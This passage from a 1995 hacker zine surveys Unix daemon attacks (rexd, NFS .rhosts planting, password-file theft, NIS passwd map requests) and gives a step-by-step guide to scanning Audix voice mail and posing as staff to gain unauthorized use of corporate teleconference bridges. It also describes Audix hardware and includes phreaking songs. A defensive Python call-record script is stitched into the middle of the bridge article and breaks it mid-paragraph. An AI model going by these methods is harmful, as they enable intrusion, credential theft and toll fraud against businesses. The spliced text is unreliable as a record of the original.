rexd (the remote execution daemon) allows you to execute a program on another Unix machine. AIX, NeXT and HPUX versions of rexd have suffered from a vulnerability allowing unintended remote execution. The rexd daemon checks your uid on the machine you are coming from, therefore you must be root on the machine you are mounting the rexd attack from. To determine if your target machine is running rexd, use the 'rcp -p ' command. You will also need the exploit program known as 'on' which is available on fine H/P boards everywhere.

--> nfs 2049 Network File System

NFS, the Network File System, from Sun Microsystems has suffered from multiple security vulnerabilities. In addition, many system administrators configure NFS incorrectly, allowing unintended remote access.
Using the command 'showmount -e ' you can view what file systems are exported from a machine. Many administrators allow read access to the /etc directory, allowing you to copy the password file. Other administrators allow write access to user directories, allowing you to create .rhosts files and gain access to the machine via rlogin or rsh. In addition to configuration issues, NFS is vulnerable to attacks using a uid masking bug, a mknod bug, and a general file handle guessing attack. Several hacked versions of the mount command have been written to exploit known vulnerabilities.

--> x11 6000-6063 X Window System

X-Windows has suffered and currently suffers from numerous vulnerabilities. One vulnerability allows you to access another user's display, another allows you to view another user's keystrokes. Another vulnerability allows a remote attacker to run every program that the root user starts in his or her .xsession file. Yet another X-Windows vulnerability allows a local user to create a root entry in the /etc/passwd file.

--> rcp

The SunOS 4.0.x rcp utility can be exploited by any trusted host listed in /etc/hosts.equiv or /.rhosts. To exploit this hole you must be running NFS (Network File System) on a Unix system or PC/NFS on a DOS system.

--> NIS

Sun's NIS (Network Information Service), also known as yp (Yellow Pages), has a vulnerability where you can request an NIS map from another NIS domain if you know the NIS domain name of the target system. There is no way to query a remote system for its NIS domain name, but many NIS domain names are easily guessable. The most popular NIS map to request is passwd.byname, the NIS implementation of /etc/passwd. In addition, if you have access to a diskless Unix workstation, you can determine the NIS domain name of the server it boots from.

+--------------------------------------------------------+
| Do not confuse NIS domain names with DNS domain names! |
+--------------------------------------------------------+

--> Other attacks

In addition to these daemon based attacks, many other methods can be used to gain access to a remote computer. These include, but are not limited to: default accounts, password guessing, sniffing, source routing, DNS routing attacks, TCP sequence prediction and uucp configuration exploits.

This should give you an idea of how daemon based attacks function. By no means is this a complete list of security vulnerabilities in privileged internet daemons. To discover more information about how these daemons operate, and how to exploit their vulnerabilities, I highly recommend reading source code, man pages and RFCs.

Voyager[TNO]

=========

THE DEFINITY AUDIX VMS INSIDE OUT
by: Boba Fett

- "What?! Another crummy file on the Audix voice mail?"

Not exactly. In COTNO #1, you will find a good article on identifying and obtaining mailboxes on the Audix Voice Mail System (VMS). This paper will discuss the physical/electrical design of the Audix System and how it's integrated with the Definity switch. I will not discuss how to obtain dialups to the audix or hacking it, that's another file :). Most of the information and diagrams in this paper were gathered from various sources. Mainly, the AT&T Tech. Journal May/June 1994, and some very cooperative AT&T representatives. ;)

1) Hardware
-----------

All right, what does this baby look like? Well, all in all, it's quite simple. There are 4 major components, all of which can be easily replaced or removed: a tape drive, a hard disk and 2 circuit boards. Here's what the Definity Audix's front panel looks like.

[Front-panel diagram; the ASCII drawing did not survive extraction. Left: the Disk/Alarm board, with the tape unit, the boot/shutdown button and a warning label. Right: the MFB panel, with a red LED, the "Enter/yes" button, a 10-character alphanumeric liquid crystal display, the "Next/no" button, the "Back" button and the handles/latch.]

As you can see, it consists of two boards: the multifunction board (right), and the disk/alarm board (left).

o MFB major components:
  - A 386 processor (supports Unix System V) with 16 megs of dynamic RAM (DRAM).
  - An array of six 50 MHz digital signal processors (DSPs).
  - The Definity switch time-division multiplexed (TDM) bus interface.
  - An alarm monitoring processor. :(

o D/ALB major components:
  - A tape drive
  - A hard drive
  - An online modem for REMOTE ALARM NOTIFICATION AND REMOTE MAINTENANCE.

The modem is included with the package. If the on-board modem does not comply with the local telco rules (for example in foreign countries), then an external one can be attached through the RS-232 port.

Let's take a deeper look inside and see where the components go.

[Block diagram; the ASCII drawing did not survive extraction. Disk/Alarm Board: tape, system disk controller, remote acs ports (tip/ring and RS-232), Ethernet to the LAN. Multifunction Board: SCSI interface, 386 CPU, serial async/sync RS-232, data packet interface to the packet bus, 16 meg RAM with DMA, faceplate and control, 3 DSP 32Cs feeding the TDM interface to the TD bus. The packet and TDM buses connect the board to the switch.]

o Explanation of some terms:
  CPU:  Central Processing Unit
  DSP:  Digital Signal Processor
  TDM:  Time-Division Multiplexed
  DMA:  Direct Memory Access
  SCSI: Small Computer System Interface

The Definity Audix VMS is so compact because it has to fit in the Definity PBX's port slot. It can: detect an incoming call, detect when the caller has disconnected, disconnect a call on ANY port. It can also disable any port to prevent it from receiving incoming calls, and most important of all, it can originate outgoing calls. It is also good to know that it has CLID. Here's a list of its functions:

- Call History Information (Called Party ID, Calling Party ID and reason for call).
- Integrated message waiting notification (LED).
- Disconnect message ("Contact Administrator for help, please disconnect, goodbye").
- Message waiting status information (updated on activity, audit of each vmb and refresh of all vmbs).
- Maintenance info. for link.
- Audix control of port (disconnect call, detect caller, etc.).

I've been referring to it as the Definity Audix, and not just Audix. Audix (aka Audix release 1) was first introduced in 1984. The Definity Audix, however, was introduced in 1992, and came with a series of more advanced features. For example, the time scale modification option was improved, allowing the playback of messages at slower or faster speeds. Or the speech encoder/decoder algorithm, which was changed, resulting in better sound quality (so they say).

How can you tell if it's a Definity when calling it remotely? Well, quite frankly I'm not sure. There is a way, however, it isn't very easy to apply. The Audix release 1 system takes approx. 1 second to detect your DTMF tones.
Now, the Definity, on the other hand, takes only about 25 milliseconds, less than half the time. You can time the reaction, and figure out what your dealing with, but there are many things that can affect the response time also (for example, the amount of people using the voice mail). As you can see this method isn't very reliable. 2) Software ----------- The system software resides on a single 160 meg casettee tape. It is loaded on the hard disk whenever an installation or upgrade is being performed. There is also a big part of the code, which constantly monitors multiple thermal sensors on the two circuit packs, making sure that they don't over heat. The chick's sweet voice you hear when interacting with the VMS, is composed of multiple fragments. A fragment can be a single word, a complete sentence, or a bunch of sentences. For example, "Please enter extension and pound sign" is most likely to be two fragments. The first being "please enter extension" and the second being "and pound sign". Obviously, this is used to save space. A second recording is: "Enter password and pound sign", the "and pound sign" is the same fragment as in the first one. Since AT&T sells it's Audix system in nearly 80 countries, there are a couple of different language tapes also. So don't be surprised if you encounter a Spanish or Japanese Audix VMS. Currently AT&T offers ten language tapes and the Definity Audix can support up to nine different language tapes simultaneously. "So if it's an Audix voice mail then there's a Definity PBX, right? " Wrong. Even though it fits the Definity PBX like a glove, it can be integrated with other switches. Some of the most common are: - G3I - System 25 - G3S - System 75 - G3R - System 85 I'm not sure about NorTel switches such as the SL-1, some people say yes, while others say that only AT&T switches can be integrated with Audix. If anyone knows, please let me know. Comments or suggestions are welcome. 
- Boba Fett <05/23/95>

=========

                     /\
                     \/
               Bridging the Gap
         /\-------------------------/\
         \/-------------------------\/
               Eddie Van Halen
                     /\
                     \/

INTRODUCTION
------------

First of all, I wrote this because for one thing I am SICK AND TIRED of sitting on IRC and seeing "k0nPhiNf0!?" pumped through my terminal every five seconds. Then, once they get the k0nPh iNf0, I am forced to constantly hear from the k0nPh people about how "DiZ k0nPh sUx!". People give me k0nPh info all the time but I NEVER call into them. Why? Because these days, they DO suck. It seems the underground world has completely forgotten about what used to be the best way to conference: BRIDGES.

ABOUT BRIDGES
-------------

I'm sure everyone reading this knows what a bridge is. Whether they know the best way to get them is another thing. I do, however, run across the occasional IRCer that /msgs me with "whats a bridge?" when I bring up the subject. Bridges are just about the same as k0nPhz, except they are usually owned and used by big businesses and schools on their own telephone equipment. This equipment is usually integrated into their voice mail and/or PBX computers and allows the company or school to hold teleconferences without relying on the national teleconference providers.

For those out there (if any?) that remember the 904-348 bridge, it was a System 75 PBX bridge used by a home school, where the students would call in in the daytime and take tests and attend classes. The way it was used was as follows: You would dial 348-XX00 to 348-XX19. That was ONE of the bridges. Anybody that connected to any number from 00 to 19 would be connected to the bridge. If two people tried to connect to the same number, it would be busy. Thus, it had 20 lines. A second bridge was reached at 348-XX20 to 348-XX29. This was off the same system, but gave you a different bridge with 10 lines. Yet another bridge could be found at 348-XX30 to 348-XX69 off the same system.

You could call in during the daytime and mess with the teachers and kids or whatever, but occasionally they would hang you up, or call you back or something. This one went down because it wasn't blocked from collect calls, and the number got very widespread throughout the k0d3lyN3 and BBS world and was constantly collect-called by lamers who didn't know how to phreak. It is, however, occasionally up for the students to use, but goes down as soon as class is over.

FINDING A BRIDGE.
-----------------

Finding a bridge used to be the easiest thing for me. It used to be, like, WHAT I DID. I would put one up on my codeline, and spread it to the others, and would call into QSD or Lutz or something about 30 minutes afterward and get messages from people who I didn't even know saying "Hey, man, thanx for puttin up that bridge!". These days I don't even bother. I don't WANT to talk to half these idiots that are around today.

Anyway, let's say you want to find a bridge. Go through the phonebook and look up all the big businesses. Call the main numbers that you find after hours and find out which ones have voice mail systems. In this article, I will focus on the Audix voicemail system made by AT&T, so look for those. To tell if your target is using Audix, press *8 during the greeting, and if it says "Enter the four digit extension and pound sign." you have found one. A complete guide to hacking Audix voice mail can be found in CoTNo #1, article #1. Railroad companies like CSX and AT&T-owned companies like Transtech or Card Services often have Audix systems with bridges.

Once you have the targeted Audix system, you need to start scanning for the system extensions. Hit *6 for the names directory and try entering CONFERENCE, BRIDGE, or TELE. You COULD possibly get the actual extension to the bridge spit out right at you (as with CSX's system), or at least most systems have that extension where you hear the person state their name, "Conference Planning".

If this is the case, you need to get a voice mail box off the system and send a message to whatever extension Conference Planning is, saying something like "Yes, I need a conference set up for such and such a date & such and such a time". This will more than likely work, and Conference Planning will usually respond with either "No problem, the teleconference bridge is at XXXX" or "All we need is the PIN number you want." However, a lot of systems do not have their *6 directory system configured very well at all, so you might want to try scanning all the XX00 and XX99 and find out where all the computer-related extensions are located. Or you might want to social engineer it out of one of the people located at an extension. Try calling from within your box and acting like you work there.

Once you have found what you think is the bridge, you need to test it out with a friend. If he calls into the same extension and gets a busy signal, you may want to tell him to try the next extension up. If the bridge is multi-lined, have him figure out how many lines the bridge has and make sure the lines are all going to the same bridge and not 3 different bridges or something. Note that if you are scanning on a railroad company's system, you will sometimes come to an extension you might think is a bridge that ends up being the dispatchers. So once you sign on to what you believe is the bridge, hit a few DTMF tones and make sure you don't hear someone say "You done hittin funny buttons!!!" or "dispatcher, mike."

SECURITY ON A BRIDGE.
---------------------

Security on a bridge is a lot different than on an Alliance or on a k0nPh. You usually don't have to worry about it getting cancelled, and the bridge usually will not ever go down if you don't third-party or collect call to it.
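Seen from the PBX owner's side, the things this section says get a bridge noticed (collect calls and third-party billing to the company, 800-number traffic, and a lot of activity on one extension) are all visible in the switch's call detail records. What follows is an added example, not code from CoTNo, from Eddie Van Halen or from AT&T: it runs a simple rule over a few constructed call records in a made-up, simplified CDR format and flags any extension whose inbound calls are mostly after hours or mostly billed to the owner. The field layout, the thresholds and the extension numbers are assumptions for the example; real PBX CDR formats differ, so the parser would need adapting.

```python
"""Flag PBX extensions showing the bridge-abuse pattern described above.

Added example (not CoTNo's or AT&T's code).  The record format is a
constructed, simplified call detail record (CDR), one line per call:
    date time,extension,direction,billing,duration_seconds
"""
from collections import defaultdict
from datetime import datetime

# Constructed sample CDR lines (not real traffic).  Extension 4100 is a
# conference bridge being dialled by outsiders at night via collect,
# third-party and 800-number calls; 4200 is an ordinary daytime extension.
SAMPLE_CDR = """\
1995-09-12 09:14:03,4200,in,direct,312
1995-09-12 10:02:41,4200,out,direct,95
1995-09-12 14:30:00,4200,in,direct,640
1995-09-12 23:05:10,4100,in,collect,5400
1995-09-12 23:06:52,4100,in,800,5210
1995-09-12 23:07:30,4100,in,third-party,5010
1995-09-13 00:15:08,4100,in,800,4800
1995-09-13 01:40:22,4100,in,collect,3600
1995-09-13 02:11:45,4100,in,direct,2400
1995-09-13 02:12:01,4100,in,800,2300
"""

BUSINESS_HOURS = range(8, 18)   # assumption: 08:00-17:59 is the working day
# Billing classes the PBX owner ends up paying for, per the article.
BILLED_TO_OWNER = {"collect", "third-party", "800"}


def parse_cdr(text):
    """Parse CDR lines into dicts; malformed lines are skipped, not fatal."""
    records = []
    for line in text.splitlines():
        parts = line.strip().split(",")
        if len(parts) != 5:
            continue
        ts, ext, direction, billing, dur = parts
        try:
            records.append({
                "time": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"),
                "ext": ext,
                "direction": direction,
                "billing": billing,
                "duration": int(dur),
            })
        except ValueError:
            continue
    return records


def flag_extensions(records, min_calls=5, after_hours_ratio=0.8,
                    owner_billed_ratio=0.5):
    """Return {extension: [reasons]} for extensions matching the pattern.

    Thresholds are assumptions for this example, not values from the
    article.  Only inbound calls are considered, and an extension needs
    at least min_calls of them before it is judged at all.
    """
    by_ext = defaultdict(list)
    for r in records:
        if r["direction"] == "in":
            by_ext[r["ext"]].append(r)

    flagged = {}
    for ext, calls in by_ext.items():
        n = len(calls)
        if n < min_calls:
            continue
        after_hours = sum(1 for c in calls
                          if c["time"].hour not in BUSINESS_HOURS)
        owner_billed = sum(1 for c in calls
                           if c["billing"] in BILLED_TO_OWNER)
        reasons = []
        if after_hours / n >= after_hours_ratio:
            reasons.append(f"{after_hours}/{n} inbound calls outside business hours")
        if owner_billed / n >= owner_billed_ratio:
            reasons.append(f"{owner_billed}/{n} inbound calls billed to the PBX owner "
                           "(collect/third-party/800)")
        if reasons:
            flagged[ext] = reasons
    return flagged


def analyze(text=SAMPLE_CDR):
    """Parse and flag in one step; returns the flagged-extension dict."""
    return flag_extensions(parse_cdr(text))


if __name__ == "__main__":
    for ext, reasons in analyze().items():
        print(f"extension {ext}: " + "; ".join(reasons))
```

On the constructed records above, extension 4100 is reported for both reasons and 4200 is not reported at all, since it has too few inbound calls to judge. The ratios rather than raw counts are what matter: a legitimate daytime bridge used by staff will have a low after-hours share and few owner-billed calls, which is exactly the contrast the article draws between employees and outside callers.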
You are not dealing with the phone company here, you are dealing with whatever business owns it, and if they detect a lot of activity on the extension, they will usually either warn you to leave by recording the conversations and playing them back to you, or just change the extension. DO expect to be dealing with the business's communication security person, though, at one time or another. They will usually talk to you and explain to you why they need you to leave, and most of the time I found out it wasn't because of the people using their bridge, it was because of the collect-calling, third-party billing, or the fact that people were using it via the 800 number and the company was having to pick up the tab.

I don't recommend finding a bridge and giving it to the entire world, because when you are not on, you don't know what goes on in the conversation, and if the company does finally decide to get it investigated, the investigators seem to go after the same thing every time: the source that gave out the bridge in the first place.

CONCLUSION
----------

Hopefully you have learned something from all this. With a little time and patience, you can set up a bridge that will last for weeks, maybe months. And besides, hacking out a phone system will teach you a lot more than setting up a k0nPh off your neighbor's phone terminal. So next time you see someone flash "k0nPhiNf0!?", tell them to get off their ass and try hacking one out for a change.

=========

Elite Music Part V - Disk Jockey/WR -

Please note the /WR. Until now I have not been in textfiles at large, only a few given to good friends. There have been other `DJ's out there; as many as six by my count, so far. So even though my group has had but one member for over four years, I keep the tag to distinguish myself.

Well, while on a (pretty lame, I must admit) conference with a barrage of lame people, sending streams of DTMF tones, long belches, humming, and music down the line, I got an idea. At one point the B-52's `Roam' was played in the background during a half-intelligent discussion of cellular telecommunications. These lyrics came to me almost immediately, and these are the results. I intend to record this song for real in a few months or so; I do have the instrumental of the real song and it would be somewhat fun to do. Maybe a .AU will be out there on the Web, sometime... and by that time these lame people might grow up. (But, I can't ask for everything.)

"Phone Roam"

Roam cyberspace, switching through every carrier
Oh girl won't you lend me one of those codes
Take it trunk to trunk, hopping through the satellites
Around the world, the call flags switchboard lights

Roam if you want to, roam around the world
Roam if you want to, without codes, without cards
Roam if you want to, roam around the world
Roam if you want to, without anything but an ESN

Hit conferences where you'll lose your mind
Toners and lamers, leave them all behind
Take it trunk to trunk, hopping through the satellites
Around the world, the call flags switchboard lights

Roam if you want to, roam around the world
Roam if you want to, without codes, without cards
Roam if you want to, roam around the world
Roam if you want to, without anything but an ESN

Go ahead and roam, go ahead and roam

Scan all you can while the Feds trace you
Hack up PBXs till your hands get tired
Take it trunk to trunk, hopping through the satellites
Around the world, the call flags switchboard lights

Roam if you want to, roam around the world
Roam if you want to, without codes, without cards
Roam if you want to, roam around the world
Roam if you want to, without anything but an ESN

Take it trunk to trunk, hopping through the satellites
Take it trunk to trunk, hopping through the satellites
Take it trunk to trunk, hopping through the satellites
Take it trunk to trunk, hopping through the satellites
Take it trunk to trunk, hopping through the satellites
Take it trunk to trunk, hopping through the satellites

Go ahead and roam, go ahead and roam

=========

End of CoTNo #06

I know you expect some snappy ending as usual to another successful issue of Communications of The New Order, but considering the grimness of much of this issue I don't think it would be appropriate. Despite all of the bad news that was presented in this issue, I hope that everyone will "keep the faith", as it were. Explore, learn, educate. But don't do anything stupid. The powers that be are becoming increasingly intent upon stopping those who are labeled as "hackers". And every day, there are more of us for them to stop. Every day, we are being introduced to new technologies that few people understand, and few people want to understand. Our desire to understand can be achieved, but we must be careful.

Even though you just read this issue's Elite Music, I thought I would finish off with another song that has special significance to me. This showed up in my e-mail the other day and it really made me think. I hope it is as meaningful to you as it was for me...

TNO MAN
-------

To the Tune of Desperado, by The Eagles

TNO man, why don't you come to your senses?
You been out jumpin' fences into those Bell yards.
Oh you're a smart one, I know that you got your reasons,
these things that are pleasin' can hurt you somehow.

Don't you hack on those old .mil sites,
they'll catch you if you're lazy,
you know diverting twice is always your best bet.
Now it seems to me some eleet things
have been shown upon your screen
but you only want the ones that you can't hack.

TNO man, oh you ain't gettin' no younger,
your hunger for knowledge, it's drivin' you on.
And hacking, oh hacking, well that's just some people talkin',
your prison is waitin' at the end of the line.

Don't your power get old on the Internet?
The account won't die and the root won't mind,
it's hard to tell the night time from the day.
You're losin' all your highs and lows,
ain't it funny how the feelin' goes away?

TNO man, why don't you come to your senses?
Come down from your firewalls, open the gateway.
It may be lamin' but there's a job waiting for you.
You better let somebody hire you
LET SOMEBODY HIRE YOU
you better let somebody hire you before it's too late.

- Don Henley, Glenn Frey and the Voyager